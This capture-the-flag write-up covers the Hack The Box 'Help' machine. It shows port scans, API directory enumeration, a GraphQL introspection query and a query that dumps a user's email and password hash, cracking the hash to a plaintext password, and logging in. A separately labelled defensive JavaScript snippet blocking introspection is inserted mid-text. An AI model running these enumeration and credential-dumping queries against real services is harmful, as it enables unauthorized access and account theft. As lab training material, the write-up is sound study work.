#hackthebox #easy #linux

# Information Gathering - Nmap

I started the box by scanning all TCP ports and discovered 3 open ports: 22, 80, and 3000.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -Pn -n --open $IP --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 01:50 UTC
Nmap scan report for 10.10.10.121
Host is up (0.050s latency).
Not shown: 65529 closed tcp ports (reset), 3 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds
```

Then I performed another TCP scan, this time with service and script detection, against only the open ports found.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80,3000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 01:51 UTC
Nmap scan report for 10.10.10.121
Host is up (0.051s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.17 seconds
```

Finally, a UDP scan against the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 01:52 UTC
Nmap scan report for 10.10.10.121
Host is up (0.051s latency).

PORT     STATE         SERVICE
53/udp   closed        domain
67/udp   closed        dhcps
123/udp  closed        ntp
135/udp  closed        msrpc
137/udp  closed        netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  closed        snmp
445/udp  open|filtered microsoft-ds
631/udp  closed        ipp
1434/udp closed        ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds
```

---

# Enumeration

##### HTTP - TCP 80

Let's first add `help.htb` to the `/etc/hosts` file.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.10.121 help.htb" | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.10.121 help.htb
```

The landing page on port 80 is just the Apache2 Ubuntu default page.

![[Pasted image 20250807205614.png]]

##### HTTP - TCP 3000

The page on port 3000 returns a JSON response, which indicates that it is not a typical HTML website but rather an API endpoint or part of a web application.

![[Pasted image 20250807205733.png]]

I ran gobuster to enumerate directories, and because we are dealing with an API endpoint, I used the `api-endpoints.txt` wordlist.
I found `graphql`.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://help.htb:3000/ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://help.htb:3000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/graphql              (Status: 400) [Size: 18]
Progress: 269 / 270 (99.63%)
===============================================================
Finished
===============================================================
```

I learned that if the appropriate security settings are not configured, that is, if introspection is left enabled on the server, the whole schema, with every type and its fields, can be dumped with an introspection query.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X POST http://help.htb:3000/graphql \
> -H "Content-Type: application/json" \
> -d '{"query": "{ __schema { types { name fields { name } } } }" }'
{"data":{"__schema":{"types":[{"name":"Query","fields":[{"name":"user"}]},{"name":"User","fields":[{"name":"username"},{"name":"password"}]},{"name":"String","fields":null},{"name":"__Schema","fields":[{"name":"types"},{"name":"queryType"},{"name":"mutationType"},{"name":"subscriptionType"},{"name":"directives"}]},{"name":"__Type","fields":[{"name":"kind"},{"name":"name"},{"name":"description"},{"name":"fields"},{"name":"interfaces"},{"name":"possibleTypes"},{"name":"enumValues"},{"name":"inputFields"},{"name":"ofType"}]},{"name":"__TypeKind","fields":null},{"name":"Boolean","fields":null},{"name":"__Field","fields":[{"name":"name"},{"name":"description"},{"name":"args"},{"name":"type"},{"name":"isDeprecated"},{"name":"deprecationReason"}]},{"name":"__InputValue","fields":[{"name":"name"},{"name":"description"},{"name":"type"},{"name":"defaultValue"}]},{"name":"__EnumValue","fields":[{"name":"name"},{"name":"description"},{"name":"isDeprecated"},{"name":"deprecationReason"}]},{"name":"__Directive","fields":[{"name":"name"},{"name":"description"},{"name":"locations"},{"name":"args"}]},{"name":"__DirectiveLocation","fields":null}]}}}
```

The output above looks ugly, so I appended `| jq .` to prettify it.

![[Pasted image 20250807221155.png]]

Now that the introspection query has shown that a `user` field exists and that its `User` type carries `username` and `password`, I attempted to dump the user information.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ curl -s -X POST http://help.htb:3000/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ user { username password } } "}' | jq .
{
  "data": {
    "user": {
      "username": "[email protected]",
      "password": "5d3c93182bb20f07b994a7f617e99cff"
    }
  }
}
```

I found a username and a password. The password is not in plaintext but hashed.
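As an added example (my own code, not the writeup's or the box's), this is the check a defender would put in front of an Express GraphQL endpoint so that the introspection query shown above is refused outside development; it uses no third-party packages, and the function names and the `nodeEnv` parameter are my own.

```javascript
// Added example, not from the original writeup or the box's code: a
// dependency-free guard that refuses GraphQL introspection queries outside
// development, the control whose absence let the schema above be dumped.

// Remove GraphQL comments (# ...) and string literals so that "__schema"
// inside a comment or a string argument does not trigger a false positive.
function stripCommentsAndStrings(query) {
  let out = "";
  let i = 0;
  while (i < query.length) {
    if (query[i] === "#") {                       // comment runs to end of line
      while (i < query.length && query[i] !== "\n") i++;
    } else if (query.startsWith('"""', i)) {      // block string """..."""
      const end = query.indexOf('"""', i + 3);
      i = end === -1 ? query.length : end + 3;
      out += " ";
    } else if (query[i] === '"') {                // ordinary string literal
      for (i++; i < query.length && query[i] !== '"'; i++) {
        if (query[i] === "\\") i++;               // skip escaped character
      }
      i++; out += " ";                            // skip closing quote
    } else {
      out += query[i++];
    }
  }
  return out;
}

// Return the introspection root fields (__schema, __type) a query selects;
// __typename is a harmless meta field and is deliberately not reported.
function findIntrospectionFields(query) {
  const cleaned = stripCommentsAndStrings(query);
  const found = new Set();
  for (const tok of cleaned.match(/[_A-Za-z][_0-9A-Za-z]*/g) || []) {
    if (tok === "__schema" || tok === "__type") found.add(tok);
  }
  return [...found].sort();
}

// Decision an Express middleware would make on the parsed JSON body before
// handing the query to the executor: HTTP 400 when introspection is requested
// and the deployment (nodeEnv, e.g. process.env.NODE_ENV) is not development.
function guardIntrospection(body, nodeEnv) {
  const query = typeof body.query === "string" ? body.query : "";
  const fields = findIntrospectionFields(query);
  if (fields.length > 0 && nodeEnv !== "development") {
    return { status: 400, error: "introspection is disabled", fields };
  }
  return { status: 200, fields };
}
```

Disabling introspection only hides the schema; the `User` type returning `password` at all is the defect to fix, since `{ user { username password } }` still works without introspection.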
I used `crackstation.net` to crack it because, judging by the look of the hash, I felt it could be cracked just fine using crackstation alone. So the valid set of credentials is `[email protected]:godhelpmeplz`.

![[Pasted image 20250807221719.png]]

Successfully logged in!

![[Pasted image 20250807222114.png]]

![[Pasted image 20250807222230.png]]

![[Pasted image 20250807222604.png]]

The final destination of my attachment is as follows:

`http://help.htb/support/?v=view_tickets&action=ticket&param[]=4&param[]=attachment&param[]=1&param[]=6`